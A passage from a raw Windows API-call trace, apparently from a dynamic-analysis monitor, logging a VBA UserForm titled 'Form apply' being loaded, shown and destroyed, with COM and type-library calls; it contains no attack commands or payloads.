Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0041.734] lstrcpynA (in: lpString1=0x185ca0, lpString2="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", iMaxLength=256 | out: lpString1="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}" [0041.734] lstrcpynA (in: lpString1=0x185ba0, lpString2="UserForm1", iMaxLength=256 | out: lpString1="UserForm1") returned="UserForm1" [0041.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x185ca0, cbMultiByte=-1, lpWideCharStr=0x185a70, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0041.734] CLSIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", pclsid=0x185ad0 | out: pclsid=0x185ad0*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f))) returned 0x0 [0041.734] StringFromGUID2 (in: rguid=0x185ad0*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), lpsz=0x3ea0b88, cchMax=256 | out: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0041.734] wsprintfA (in: param_1=0x185730, param_2="%s%s%s%s%s" | out: param_1="Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\Instance CLSID") returned 59 [0041.734] RegQueryValueA (in: hKey=0xffffffff80000000, lpSubKey="Clsid\\{C62A69F0-16DC-11CE-9E98-00AA00574A4F}\\Instance CLSID", lpData=0x185630, lpcbData=0x185620 | out: lpData="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpcbData=0x185620) returned 0x2 [0041.734] InvalidateRect (hWnd=0x1020c, lpRect=0x0, bErase=0) returned 1 [0041.734] lstrlenA (lpString="UserForm1") returned 9 [0041.734] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.734] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 0x10a0c6 [0041.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x185ca0, cbMultiByte=-1, lpWideCharStr=0x185aa0, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0041.734] IIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpiid=0x185af0 | out: lpiid=0x185af0) returned 0x0 [0041.734] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 0x10a0c6 [0041.734] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x185ca0, cbMultiByte=-1, lpWideCharStr=0x185a30, cchWideChar=39 | out: lpWideCharStr="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}") returned 39 [0041.734] IIDFromString (in: lpsz="{C62A69F0-16DC-11CE-9E98-00AA00574A4F}", lpiid=0x185a80 | out: lpiid=0x185a80) returned 0x0 [0041.735] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="UserForm1") returned 0x10d629 [0041.735] GetCurrentThreadId () returned 0x8c0 [0041.735] lstrcmpiA (lpString1="Begin", lpString2="Caption") returned -1 [0041.735] lstrcmpiA (lpString1="End", lpString2="Caption") returned 1 [0041.735] lstrcpynA (in: lpString1=0x1859c0, lpString2="Caption", iMaxLength=261 | out: lpString1="Caption") returned="Caption" [0041.735] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="Caption") returned 0x107810 [0041.735] lstrcmpiA (lpString1="Caption", lpString2="Caption") returned 0 [0041.735] lstrcmpiA (lpString1="Begin", lpString2="ClientHeight") returned -1 [0041.735] lstrcmpiA (lpString1="End", lpString2="ClientHeight") returned 1 [0041.735] lstrcpynA (in: lpString1=0x1859c0, lpString2="ClientHeight", iMaxLength=261 | out: lpString1="ClientHeight") returned="ClientHeight" [0041.735] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientHeight") returned 0x107da9 [0041.735] lstrcmpiA (lpString1="ClientHeight", lpString2="ClientHeight") returned 0 [0041.735] lstrcpynA (in: lpString1=0x4de8380, lpString2="3855", iMaxLength=261 | out: lpString1="3855") returned="3855" [0041.736] atof (_String="3855") returned 0x27412f0 [0041.736] lstrcmpiA (lpString1="Begin", lpString2="ClientLeft") returned -1 [0041.736] lstrcmpiA (lpString1="End", lpString2="ClientLeft") returned 1 [0041.736] lstrcpynA (in: lpString1=0x1859c0, lpString2="ClientLeft", iMaxLength=261 | out: lpString1="ClientLeft") returned="ClientLeft" [0041.736] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientLeft") returned 0x104925 [0041.736] lstrcmpiA (lpString1="ClientLeft", lpString2="ClientLeft") returned 0 [0041.736] lstrcpynA (in: lpString1=0x4de8380, lpString2="45", iMaxLength=261 | out: lpString1="45") returned="45" [0041.736] atof (_String="45") returned 0x27412f0 [0041.736] lstrcmpiA (lpString1="Begin", lpString2="ClientTop") returned -1 [0041.736] lstrcmpiA (lpString1="End", lpString2="ClientTop") returned 1 [0041.736] lstrcpynA (in: lpString1=0x1859c0, lpString2="ClientTop", iMaxLength=261 | out: lpString1="ClientTop") returned="ClientTop" [0041.736] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientTop") returned 0x109869 [0041.737] lstrcmpiA (lpString1="ClientTop", lpString2="ClientTop") returned 0 [0041.737] lstrcpynA (in: lpString1=0x4de8380, lpString2="330", iMaxLength=261 | out: lpString1="330") returned="330" [0041.737] atof (_String="330") returned 0x27412f0 [0041.737] lstrcmpiA (lpString1="Begin", lpString2="ClientWidth") returned -1 [0041.737] lstrcmpiA (lpString1="End", lpString2="ClientWidth") returned 1 [0041.737] lstrcpynA (in: lpString1=0x1859c0, lpString2="ClientWidth", iMaxLength=261 | out: lpString1="ClientWidth") returned="ClientWidth" [0041.737] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="ClientWidth") returned 0x1028e4 [0041.737] lstrcmpiA (lpString1="ClientWidth", lpString2="ClientWidth") returned 0 [0041.737] lstrcpynA (in: lpString1=0x4de8380, lpString2="8550", iMaxLength=261 | out: lpString1="8550") returned="8550" [0041.737] atof (_String="8550") returned 0x27412f0 [0041.737] lstrcmpiA (lpString1="Begin", lpString2="StartUpPosition") returned -1 [0041.737] lstrcmpiA (lpString1="End", lpString2="StartUpPosition") returned -1 [0041.737] lstrcpynA (in: lpString1=0x1859c0, lpString2="StartUpPosition", iMaxLength=261 | out: lpString1="StartUpPosition") returned="StartUpPosition" [0041.737] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="StartUpPosition") returned 0x10fb67 [0041.737] lstrcmpiA (lpString1="StartUpPosition", lpString2="StartUpPosition") returned 0 [0041.737] lstrcpynA (in: lpString1=0x4de8380, lpString2="1", iMaxLength=261 | out: lpString1="1") returned="1" [0041.737] lstrcmpiA (lpString1="Begin", lpString2="TypeInfoVer") returned -1 [0041.737] lstrcmpiA (lpString1="End", lpString2="TypeInfoVer") returned -1 [0041.737] lstrcpynA (in: lpString1=0x1859c0, lpString2="TypeInfoVer", iMaxLength=261 | out: lpString1="TypeInfoVer") returned="TypeInfoVer" [0041.738] LHashValOfNameSysA (syskind=0x1, lcid=0x409, szName="TypeInfoVer") returned 0x107334 [0041.738] lstrcmpiA (lpString1="TypeInfoVer", lpString2="TypeInfoVer") returned 0 [0041.738] lstrcpynA (in: lpString1=0x4de8380, lpString2="83", iMaxLength=261 | out: lpString1="83") returned="83" [0041.738] lstrcmpiA (lpString1="Begin", lpString2="End") returned -1 [0041.738] lstrcmpiA (lpString1="End", lpString2="End") returned 0 [0041.738] lstrlenA (lpString="Form apply") returned 10 [0041.738] IsRectEmpty (lprc=0x2749e30) returned 1 [0041.738] LoadIconA (hInstance=0x7fee4230000, lpIconName=0x4b1) returned 0x10215 [0041.738] RegisterClassA (lpWndClass=0x185640) returned 0xc1ac [0041.739] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001e1) returned 1 [0041.739] CreateMDIWindowA (lpClassName=0xc1ac, lpWindowName=0x0, dwStyle=0x46cf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x10204, hInstance=0x7fee4230000, lParam=0x0) returned 0x1023e [0041.740] GetWindow (hWnd=0x1023e, uCmd=0x5) returned 0x0 [0041.740] GetWindowLongPtrA (hWnd=0x1023e, nIndex=0) returned 0x0 [0041.740] GetWindowLongPtrA (hWnd=0x1023e, nIndex=0) returned 0x0 [0041.740] GetWindowLongPtrA (hWnd=0x1023e, nIndex=0) returned 0x0 [0041.740] GetWindowLongPtrA (hWnd=0x1023e, nIndex=0) returned 0x0 [0041.740] SetWindowLongPtrA (hWnd=0x1023e, nIndex=0, dwNewLong=0x2749d98) returned 0x0 [0041.740] LoadIconA (hInstance=0x7fee4230000, lpIconName=0x4b1) returned 0x10215 [0041.740] SendMessageA (hWnd=0x1023e, Msg=0x80, wParam=0x1, lParam=0x10215) returned 0x0 [0041.742] GetSystemMetrics (nIndex=50) returned 16 [0041.742] GetSystemMetrics (nIndex=49) returned 16 [0041.742] LoadImageA (hInst=0x7fee4230000, name=0x4b1, type=0x1, cx=16, cy=16, fuLoad=0x0) returned 0x1021f [0041.742] SendMessageA (hWnd=0x1023e, Msg=0x80, wParam=0x0, lParam=0x1021f) returned 0x0 [0041.742] GetWindowPlacement (in: hWnd=0x1023e, lpwndpl=0x1855a0 | out: lpwndpl=0x1855a0) returned 1 [0041.742] GetWindowLongA (hWnd=0x1023e, nIndex=-16) returned 1187971072 [0041.742] CopyRect (in: lprcDst=0x2749e30, lprcSrc=0x1855bc | out: lprcDst=0x2749e30) returned 1 [0041.742] PostMessageA (hWnd=0x10202, Msg=0x1043, wParam=0x0, lParam=0x0) returned 1 [0041.742] SetWindowLongPtrA (hWnd=0x1023e, nIndex=-21, dwNewLong=0x1) returned 0x0 [0041.742] InvalidateRect (hWnd=0x1023e, lpRect=0x0, bErase=1) returned 1 [0041.743] IUnknown:AddRef (This=0x6c92d70) returned 0x11 [0041.743] ITypeLib:GetTypeInfoOfGuid (in: This=0x6c92d70, GUID=0x7fee45df7f8, ppTInfo=0x4de30f8 | out: ppTInfo=0x4de30f8*=0x6cb66d8) returned 0x0 [0041.743] IUnknown:Release (This=0x6c92d70) returned 0x11 [0041.743] GetPropA (hWnd=0x1023e, lpString="VBAutomation") returned 0x0 [0041.743] SetPropA (hWnd=0x1023e, lpString="VBAutomation", hData=0x4de30d8) returned 1 [0041.743] lstrcpyA (in: lpString1=0x1857d0, lpString2="Thunder" | out: lpString1="Thunder") returned="Thunder" [0041.743] lstrcpyA (in: lpString1=0x1856a0, lpString2="Thunder" | out: lpString1="Thunder") returned="Thunder" [0041.743] GetClassInfoA (in: hInstance=0x7fee4230000, lpClassName="ThunderDFrame", lpWndClass=0x185650 | out: lpWndClass=0x185650) returned 0 [0041.743] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0041.743] RegisterClassA (lpWndClass=0x185650) returned 0xc1ad [0041.743] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001e2) returned 1 [0041.743] AdjustWindowRectEx (in: lpRect=0x185780, dwStyle=0x44c80080, bMenu=0, dwExStyle=0x40001 | out: lpRect=0x185780) returned 1 [0041.743] MonitorFromWindow (hwnd=0x10202, dwFlags=0x2) returned 0x10001 [0041.743] GetMonitorInfoA (in: hMonitor=0x10001, lpmi=0x1857a0 | out: lpmi=0x1857a0) returned 1 [0041.743] GetWindowLongPtrA (hWnd=0x1023e, nIndex=0) returned 0x2749d98 [0041.743] IsRectEmpty (lprc=0x2749e30) returned 0 [0041.743] CreateWindowExA (dwExStyle=0x40001, lpClassName=0xc1ad, lpWindowName="Form apply", dwStyle=0x44c80080, X=7, Y=7, nWidth=586, nHeight=295, hWndParent=0x1023e, hMenu=0x0, hInstance=0x7fee4230000, lpParam=0x0) returned 0x10240 [0041.744] GetParent (hWnd=0x10240) returned 0x1023e [0041.744] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x81, wParam=0x0, lParam=0x1850c0) returned 0x1 [0041.744] GetParent (hWnd=0x10240) returned 0x1023e [0041.744] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x83, wParam=0x0, lParam=0x185110) returned 0x0 [0041.744] GetParent (hWnd=0x10240) returned 0x1023e [0041.744] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x1, wParam=0x0, lParam=0x1850a0) returned 0x0 [0041.744] GetParent (hWnd=0x10240) returned 0x1023e [0041.744] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x5, wParam=0x0, lParam=0x101023a) returned 0x0 [0041.744] GetParent (hWnd=0x10240) returned 0x1023e [0041.744] IsZoomed (hWnd=0x10240) returned 0 [0041.744] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x3, wParam=0x0, lParam=0x25000f) returned 0x0 [0041.744] DeactivateActCtx (dwFlags=0x0, ulCookie=0x10016e9a000001e3) returned 1 [0041.744] GetParent (hWnd=0x10240) returned 0x1023e [0041.744] lstrcmpiA (lpString1="Begin", lpString2="End") returned -1 [0041.744] GetParent (hWnd=0x10240) returned 0x1023e [0041.744] CoGetClassObject (in: rclsid=0x274bcb8*(Data1=0xc62a69f0, Data2=0x16dc, Data3=0x11ce, Data4=([0]=0x9e, [1]=0x98, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x4a, [7]=0x4f)), dwClsContext=0x3, pvReserved=0x0, riid=0x7fee45e3748*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x185d90 | out: ppv=0x185d90*=0x7fee329e490) returned 0x0 [0041.796] UserForm:IClassFactory:CreateInstance (in: This=0x7fee329e490, pUnkOuter=0x0, riid=0x7fee45c7890*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x4de8290 | out: ppvObject=0x4de8290*=0x3c02be0) returned 0x0 [0041.800] UserForm:IUnknown:AddRef (This=0x7fee329e490) returned 0x1 [0041.800] UserForm:IClassFactory:LockServer (This=0x7fee329e490, fLock=1) returned 0x0 [0041.800] UserForm:IUnknown:Release (This=0x7fee329e490) returned 0x1 [0041.800] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45e3320*(Data1=0xcf51ed10, Data2=0x62fe, Data3=0x11cf, Data4=([0]=0xbf, [1]=0x86, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x3, [6]=0x48, [7]=0x36)), ppvObject=0x185cf0 | out: ppvObject=0x185cf0*=0x6bc2d20) returned 0x0 [0041.825] MulDiv (nNumber=2540, nNumerator=8, nDenominator=96) returned 212 [0041.825] MulDiv (nNumber=2540, nNumerator=8, nDenominator=96) returned 212 [0041.825] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45e3310*(Data1=0xb196b288, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x185cb0 | out: ppvObject=0x185cb0*=0x6bc2db0) returned 0x0 [0041.826] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45d8a60*(Data1=0x10a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x185c18 | out: ppvObject=0x185c18*=0x6bc2db0) returned 0x0 [0041.826] CExposedDocFile::AddRef () returned 0x2 [0041.826] CExposedDocFile::AddRef () returned 0x3 [0041.863] CExposedDocFile::Release () returned 0x3 [0041.863] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45e1b50*(Data1=0x5efc7970, Data2=0x14bc, Data3=0x11cf, Data4=([0]=0x9b, [1]=0x2b, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x57, [6]=0x38, [7]=0x19)), ppvObject=0x4de82e8 | out: ppvObject=0x4de82e8*=0x6bc2d20) returned 0x0 [0041.864] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45c78b0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x185df0 | out: ppvObject=0x185df0*=0x3c02c68) returned 0x0 [0041.865] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45c78b0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x185df0 | out: ppvObject=0x185df0*=0x3c02c68) returned 0x0 [0041.865] GetWindowLongA (hWnd=0x10240, nIndex=-20) returned 262401 [0041.865] SetWindowLongA (hWnd=0x10240, nIndex=-20, dwNewLong=262401) returned 262401 [0041.866] GetParent (hWnd=0x10240) returned 0x1023e [0041.866] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x7c, wParam=0xffffffffffffffec, lParam=0x185da0) returned 0x0 [0041.866] GetParent (hWnd=0x10240) returned 0x1023e [0041.866] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x7d, wParam=0xffffffffffffffec, lParam=0x185da0) returned 0x0 [0041.866] GetParent (hWnd=0x10240) returned 0x1023e [0041.866] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x7f, wParam=0x2, lParam=0x0) returned 0x0 [0041.866] GetParent (hWnd=0x10240) returned 0x1023e [0041.866] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x0 [0041.866] GetParent (hWnd=0x10240) returned 0x1023e [0041.866] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x7f, wParam=0x1, lParam=0x0) returned 0x0 [0041.866] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45e3310*(Data1=0xb196b288, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x185e00 | out: ppvObject=0x185e00*=0x6bc2ea0) returned 0x0 [0041.867] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45e1f20*(Data1=0x112, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x185cc0 | out: ppvObject=0x185cc0*=0x6bc2ea0) returned 0x0 [0041.867] LoadAcceleratorsA (hInstance=0x7fee4230000, lpTableName=0x3e8) returned 0x10225 [0041.868] IsWindow (hWnd=0x10244) returned 1 [0041.868] GetParent (hWnd=0x10240) returned 0x1023e [0041.868] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x210, wParam=0x1, lParam=0x10244) returned 0x0 [0041.869] PostMessageA (hWnd=0x10240, Msg=0x105f, wParam=0x0, lParam=0x0) returned 1 [0041.869] GetCurrentThreadId () returned 0x8c0 [0041.869] CExposedStream::Commit () returned 0x0 [0041.869] CExposedStream::Release () returned 0x0 [0041.869] GlobalHandle (pMem=0x3c28ae0) returned 0x6e50078 [0041.869] GlobalUnlock (hMem=0x6e50078) returned 0 [0041.869] SetFocus (hWnd=0x50024) returned 0x50024 [0041.869] UserForm:IUnknown:AddRef (This=0x3c02be0) returned 0x0 [0041.869] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45e08e0*(Data1=0x468cfb80, Data2=0xb4f9, Data3=0x11cf, Data4=([0]=0x80, [1]=0xdd, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x61, [6]=0x48, [7]=0x95)), ppvObject=0x186148 | out: ppvObject=0x186148*=0x6bc3380) returned 0x0 [0041.886] GetCapture () returned 0x0 [0041.886] ShowWindow (hWnd=0x10240, nCmdShow=0) returned 0 [0041.886] GetParent (hWnd=0x10240) returned 0x1023e [0041.886] GetParent (hWnd=0x10240) returned 0x1023e [0041.886] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45e1f30*(Data1=0x113, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x185d50 | out: ppvObject=0x185d50*=0x3c02c70) returned 0x0 [0041.886] UserForm:IUnknown:AddRef (This=0x3c02c70) returned 0x0 [0041.886] UserForm:IOleInPlaceObject:InPlaceDeactivate (This=0x3c02c70) returned 0x0 [0041.887] IsWindow (hWnd=0x10244) returned 1 [0041.887] GetParent (hWnd=0x10240) returned 0x1023e [0041.887] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x210, wParam=0x2, lParam=0x10244) returned 0x0 [0041.887] UserForm:IUnknown:Release (This=0x3c02c70) returned 0x0 [0041.887] UserForm:IUnknown:Release (This=0x3c02c70) returned 0x0 [0041.887] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45de860*(Data1=0xb196b284, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x185db8 | out: ppvObject=0x185db8*=0x6c12600) returned 0x0 [0041.887] UserForm:IConnectionPointContainer:FindConnectionPoint (in: This=0x6c12600, riid=0x7fee45de880*(Data1=0x9bfbbc02, Data2=0xeff1, Data3=0x101a, Data4=([0]=0x84, [1]=0xed, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppCP=0x185db0 | out: ppCP=0x185db0*=0x6c12618) returned 0x0 [0041.888] IConnectionPoint:Unadvise (This=0x6c12618, dwCookie=0xffffffff) returned 0x0 [0041.888] UserForm:IUnknown:Release (This=0x6c12618) returned 0x0 [0041.888] UserForm:IUnknown:Release (This=0x6c12600) returned 0x0 [0041.888] UserForm:IUnknown:QueryInterface (in: This=0x3c02be0, riid=0x7fee45e2620*(Data1=0x10d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x185dc0 | out: ppvObject=0x185dc0*=0x3c02bf8) returned 0x0 [0041.888] UserForm:IViewObject:SetAdvise (This=0x3c02bf8, aspects=0x1, advf=0x0, pAdvSink=0x0) returned 0x0 [0041.888] UserForm:IUnknown:Release (This=0x3c02bf8) returned 0x0 [0041.888] UserForm:IUnknown:Release (This=0x3c02be0) returned 0x0 [0041.888] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x1081, wParam=0x0, lParam=0x0) returned 0x0 [0041.888] GetWindow (hWnd=0x10240, uCmd=0x5) returned 0x0 [0041.888] DestroyWindow (hWnd=0x10240) returned 1 [0041.888] GetParent (hWnd=0x10240) returned 0x1023e [0041.888] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x90, wParam=0x0, lParam=0x0) returned 0x0 [0041.888] GetParent (hWnd=0x10240) returned 0x1023e [0041.888] GetPropA (hWnd=0x10240, lpString="VBAutomation") returned 0x0 [0041.888] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x2, wParam=0x0, lParam=0x0) returned 0x0 [0041.888] GetParent (hWnd=0x10240) returned 0x1023e [0041.888] NtdllDefWindowProc_A (hWnd=0x10240, Msg=0x82, wParam=0x0, lParam=0x0) returned 0x0 [0041.889] GetFocus () returned 0x50024 [0041.889] SetWindowLongA (hWnd=0x1023e, nIndex=0, dwNewLong=0) returned 41196952 [0041.889] IsWindowVisible (hWnd=0x1023e) returned 0 [0041.889] ShowWindow (hWnd=0x1023e, nCmdShow=0) returned 0 [0041.889] SendMessageA (hWnd=0x10204, Msg=0x221, wParam=0x1023e, lParam=0x0) returned 0x0 [0041.889] NtdllDefWindowProc_A (hWnd=0x1023e, Msg=0x7f, wParam=0x0, lParam=0x0) returned 0x1021f [0041.889] DestroyCursor (hCursor=0x1021f) returned 1 [0041.889] GetPropA (hWnd=0x1023e, lpString="VBAutomation") returned 0x4de30d8 [0041.889] GetPropA (hWnd=0x1023e, lpString="VBAutomation") returned 0x4de30d8 [0041.889] RemovePropA (hWnd=0x1023e, lpString="VBAutomation") returned 0x4de30d8 [0041.889] IUnknown:Release (This=0x6cb66d8) returned 0x8 [0041.889] UserForm:IUnknown:Release (This=0x3c02be0) returned 0x0 [0041.889] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e9a8, ppTypeAttr=0x186140, pDummy=0x3 | out: ppTypeAttr=0x186140, pDummy=0x3) returned 0x0 [0041.889] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e9a8) returned 0x0 [0041.890] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186030 | out: ppvObject=0x186030*=0x0) returned 0x80004002 [0041.890] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45d5af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x186000 | out: ppvObject=0x186000*=0x0) returned 0x80004002 [0041.890] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45e0b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185ff0 | out: ppvObject=0x185ff0*=0x0) returned 0x80004002 [0041.890] IUnknown:QueryInterface (in: This=0x6a6e9a8, riid=0x7fee45e0b88*(Data1=0xcacc1e88, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x185ff8 | out: ppvObject=0x185ff8*=0x0) returned 0x80004002 [0041.890] ITypeInfo:RemoteGetTypeAttr (in: This=0x6a6e9a8, ppTypeAttr=0x186028, pDummy=0x10 | out: ppTypeAttr=0x186028, pDummy=0x10) returned 0x0 [0041.890] ITypeInfo:LocalReleaseTypeAttr (This=0x6a6e9a8) returned 0x0 [0041.890] IUnknown:AddRef (This=0x6a6e9a8) returned 0x3 [0041.890] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x6bc3380 [0041.891] IMalloc:Alloc (This=0x7feffc15380, cb=0x20) returned 0x6bc3800 [0041.891] IUnknown:Release (This=0x6a6e8e8) returned 0x2 [0041.891] IUnknown:Release (This=0x6c6be98) returned 0x1 [0041.891] IMalloc:Free (This=0x7feffc15380, pv=0x6c32970) [0041.891] IMalloc:Free (This=0x7feffc15380, pv=0x6c32870) [0041.891] IUnknown:Release (This=0x6a6e9a8) returned 0x2 [0041.891] ITypeInfo:RemoteGetContainingTypeLib (in: This=0x6a6e9a8, ppTLib=0x1860a8, pIndex=0x1860d8 | out: ppTLib=0x1860a8*=0x6c93310, pIndex=0x1860d8*=0x1) returned 0x0 [0041.892] CreateTypeLib2 (in: syskind=0x1, szFile="TempFormFrame.exd", ppctlib=0x186088*=0x0 | out: ppctlib=0x186088*=0x6c93b88) returned 0x0 [0041.892] ITypeLib:RemoteGetLibAttr (in: This=0x6c93310, ppTLibAttr=0x186118, pDummy=0x6 | out: ppTLibAttr=0x186118, pDummy=0x6) returned 0x0 [0041.892] CoCreateGuid (in: pguid=0x1860f0 | out: pguid=0x1860f0*(Data1=0xa508b754, Data2=0x58cc, Data3=0x4530, Data4=([0]=0x90, [1]=0x94, [2]=0x3c, [3]=0xd6, [4]=0x3c, [5]=0x1f, [6]=0x39, [7]=0xa2))) returned 0x0 [0041.892] ICreateTypeLib:SetGuid (This=0x6c93b88, GUID=0x1860f0*(Data1=0xa508b754, Data2=0x58cc, Data3=0x4530, Data4=([0]=0x90, [1]=0x94, [2]=0x3c, [3]=0xd6, [4]=0x3c, [5]=0x1f, [6]=0x39, [7]=0xa2))) returned 0x0 [0041.892] ICreateTypeLib:SetLcid (This=0x6c93b88, lcid=0x409) returned 0x0 [0041.892] ICreateTypeLib:SetLibFlags (This=0x6c93b88, uLibFlags=0x0) returned 0x0 [0041.892] ICreateTypeLib:SetVersion (This=0x6c93b88, 